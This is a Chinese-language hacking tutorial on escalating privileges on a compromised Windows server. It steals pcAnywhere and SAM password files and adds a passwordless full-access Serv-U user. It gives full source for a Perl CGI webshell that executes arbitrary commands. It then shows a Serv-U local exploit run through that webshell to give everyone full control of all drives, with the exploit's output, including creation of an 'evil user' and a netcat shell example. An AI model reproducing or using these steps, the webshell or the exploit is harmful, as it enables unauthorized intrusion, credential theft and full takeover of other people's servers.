1.看能否跳转到这个目录

C:/Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/

如果行那就最好了，直接下它的CIF文件，得到pcAnywhere密码，登陆

2.C:/WINNT/system32/config/

进这里下它的SAM，破解用户的密码

用到破解sam密码的软件有LC，SAMinside

3.C:/Documents and Settings/All Users/「开始」菜单/程序/

看这里能跳转不，我们从这里可以获取好多有用的信息

可以看见好多快捷方式，我们一般选择Serv-U的，然后本地查看属性，知道路径后，看能否跳转

进去后，如果有权限修改ServUDaemon.ini，加个用户上去，密码为空

[USER=WekweN|1]

Password=

HomeDir=c:/

TimeOut=600

Maintenance=System

Access1=C:/|RWAMELCDP

Access1=d:/|RWAMELCDP

Access1=f:/|RWAMELCDP

SKEYValues=

这个用户具有最高权限，然后我们就可以ftp上去 quote site exec xxx 来提升权限

4.c:/winnt/system32/inetsrv/data/

就是这个目录，同样是erveryone 完全控制，我们所要做的就是把提升权限的工具上传上去，然后执行

5.看能否跳转到如下目录

c:/php, 用phpspy

c:/prel，有时候不一定是这个目录(同样可以通过下载快捷方式看属性获知)用cgi的webshell

#!/usr/bin/perl

binmode(STDOUT);

syswrite(STDOUT, "Content-type: text/html/r/n/r/n", 27);

$_ = $ENV{QUERY_STRING};

s/%20/ /ig;

s/%2f////ig;

$execthis = $_;

syswrite(STDOUT, "

/r/n", 13);

open(STDERR, ">&STDOUT") || die "Can’t redirect STDERR";

system($execthis);

syswrite(STDOUT, "/r/n

/r/n", 17);

close(STDERR);

close(STDOUT);

exit;

保存为cgi执行,

如果不行，可以试试 pl 扩展呢，把刚才的 cgi 文件改为 pl 文件，提交 http://anyhost//cmd.pl?dir

显示"拒绝访问"，表示可以执行了!马上提交：先的上传个su.exe(ser-u提升权限的工具)到 prel的bin目录

http://anyhost//cmd.pl?c/perl/bin/su.exe

返回：

Serv-u >3.x Local Exploit by xiaolu

USAGE: serv-u.exe "command"

Example: serv-u.exe "nc.exe -l -p 99 -e cmd.exe"

现在是 IUSR 权限，提交：

http://anyhost//cmd.pl?c/perl/bin/su.exe "cacls.exe c: /E /T /G everyone:F"

http://anyhost//cmd.pl?c/perl/bin/su.exe "cacls.exe d: /E /T /G everyone:F"

http://anyhost//cmd.pl?c/perl/bin/su.exe "cacls.exe e: /E /T /G everyone:F"

http://anyhost//cmd.pl?c/perl/bin/su.exe "cacls.exe f: /E /T /G everyone:F"

如果返回下面的信息，就表示成功了

Serv-u >3.x Local Exploit by xiaolu

<220 Serv-U FTP Server v5.2 for WinSock ready...

>USER LocalAdministrator

<331 User name okay, need password.

******************************************************

>PASS #l@$ak#.lk;0@P

<230 User logged in, proceed.

******************************************************

>SITE MAINTENANCE

******************************************************

[+] Creating New Domain...

<200-DomainID=2

<220 Domain settings saved

******************************************************

[+] Domain xl:2 Created

[+] Creating Evil User

<200-User=xl

200 User settings saved

******************************************************

[+] Now Exploiting...

>USER xl

<331 User name okay, need password.

******************************************************

>PASS 111111

<230 User logged in, proceed.